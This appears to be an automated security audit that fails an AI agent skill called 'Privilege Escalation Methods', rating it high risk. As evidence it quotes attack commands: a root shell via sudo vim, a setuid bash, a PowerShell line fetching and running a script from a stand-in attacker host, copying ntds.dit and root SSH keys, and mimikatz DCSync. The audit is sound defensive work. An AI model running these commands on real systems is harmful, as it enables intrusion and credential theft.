Skills
skills/davila7/claude-code-templates/Privilege Escalation Methods/Gen Agent Trust Hub

Privilege Escalation Methods

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFE
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill provides numerous commands specifically designed to elevate privileges by exploiting system misconfigurations.
  • Evidence: Linux commands like sudo vim -c ':!/bin/bash' and chmod +s /bin/bash in SKILL.md are used to gain root access.
  • Evidence: Windows commands like Invoke-ServiceAbuse and ExploitCapcom.exe target service and driver vulnerabilities.
  • REMOTE_CODE_EXECUTION (HIGH): The skill includes patterns for downloading and executing remote scripts in a single step.
  • Evidence: powershell.exe -c 'iex (iwr http://attacker/shell.ps1)' in the Golden Ticket persistence section of SKILL.md uses Invoke-Expression with Invoke-WebRequest to run remote code.
  • DATA_EXFILTRATION (HIGH): The skill contains instructions for accessing and copying highly sensitive files that store system identities and credentials.
  • Evidence: Commands in SKILL.md demonstrate how to copy ntds.dit (Active Directory database) and the SYSTEM hive using SeBackupPrivilege and Volume Shadow Copy (vssadmin).
  • Evidence: Usage of tar to access and copy private SSH keys from /root/.ssh/id_rsa via capability abuse.
  • CREDENTIALS_UNSAFE (MEDIUM): The skill provides methodologies for harvesting and dumping credentials from memory and network traffic.
  • Evidence: Specific instructions for using mimikatz to perform DCSync attacks and Responder for LLMNR poisoning.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 04:31 PM